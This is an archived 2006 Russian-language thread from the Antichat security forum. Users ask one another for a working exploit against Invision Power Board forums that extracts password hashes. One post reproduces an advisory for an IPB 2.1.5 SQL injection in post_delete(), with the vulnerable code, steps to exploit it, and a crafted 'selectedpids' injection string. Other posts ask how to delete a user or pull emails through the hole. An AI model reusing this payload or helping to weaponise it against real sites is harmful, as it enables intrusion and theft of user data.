ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.05.2006, 13:05
|
|
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032
Репутация:
1
|
|
ну так выложи....исправленный....
|
|
|
02.05.2006, 13:16
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
Провел на форуме:
1730553
Репутация:
319
|
|
TRes,кинь людям сорс.
|
|
|
|
02.05.2006, 13:21
|
|
Новичок
Регистрация: 16.11.2004
Сообщений: 29
Провел на форуме:
47488
Репутация:
-2
|
|
Мдя, опять править...скажите хоть в какой строке ошибка...
|
|
|
|
02.05.2006, 14:48
|
|
Новичок
Регистрация: 22.04.2006
Сообщений: 20
Провел на форуме:
92091
Репутация:
5
|
|
Там не ошибка. Он и в исходном виде на английской версии IPB будет прекрасно работать. А на русской неисправленный сплоит выдает Post ошибку. На ветке же 2.0.х как раз и получаются нули вместо хеша.
|
|
|
|
02.05.2006, 15:17
|
|
Новичок
Регистрация: 02.05.2006
Сообщений: 2
Провел на форуме:
13209
Репутация:
0
|
|
а у меня вообще не запускается сплоит от milw0rm через cygwin :-(. Что там надо исправить? или дайте рабочую версию. :-)
|
|
|
|
02.05.2006, 16:40
|
|
Новичок
Регистрация: 16.11.2004
Сообщений: 29
Провел на форуме:
47488
Репутация:
-2
|
|
А на русской неисправленный сплоит выдает Post ошибку. На ветке же 2.0.х как раз и получаются нули вместо хеша.
На русском 2.1.1 нет post-еррора, но нули вместо хеша, а на 2.1.5 post-error! Выложи плз рабочий!
|
|
|
|
02.05.2006, 17:00
|
|
Познающий
Регистрация: 16.04.2006
Сообщений: 34
Провел на форуме:
121651
Репутация:
41
|
|
как будет выглядеть sql команда на удаление пользователя с ником lol ?
|
|
|
|
02.05.2006, 21:16
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800
Репутация:
547
|
|
Реално тестил на 2 1 4 , всё работает,но даёт только 0000000000000000, значить всё проходит, проста какаята фикса стоит ))
|
|
|
|
03.05.2006, 22:39
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
Invision Power Board v2.1.5 Remote SQL Injection
Filename :- func_mod.php
Functionname :- post_delete()
Lines :- 89 To 209
Bug Found By :- Devil-00
Greetz :-
Rock Master ^ Hackers Pal ^ n0m4rcy ^
www.securtygurus.net
Код:
if ( is_array( $id ) )
{
if ( count($id) > 0 )
{
$pid = " IN(".implode(",",$id).")";
}
else
{
return FALSE;
}
}
else
{
if ( intval($id) )
{
$pid = "=$id";
}
else
{
return FALSE;
}
}
When $id = array .. the code don't check it if ( INTVAL )
Код:
if ( count($id) > 0 )
{
$pid = " IN(".implode(",",$id).")";
}
Then We Can Do SQL Injection Here >>
Код:
$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );
And Here >>
Код:
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );
Cuz We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit  Baaad
Exm. To Exploit
1- First Add 2 Post
2- Check It To Delete
3- Edit String Query By HTTPLiveHeader
Код:
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete
__________________
ПИУ-ПИУ...
|
|
|
|
07.05.2006, 00:06
|
|
Постоянный
Регистрация: 05.05.2006
Сообщений: 743
Провел на форуме:
2982851
Репутация:
107
|
|
Такой вопрос:Можно ли через sql инъект вытащить мыло из акка юзера на IPB?Или придется брутить его пароль?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
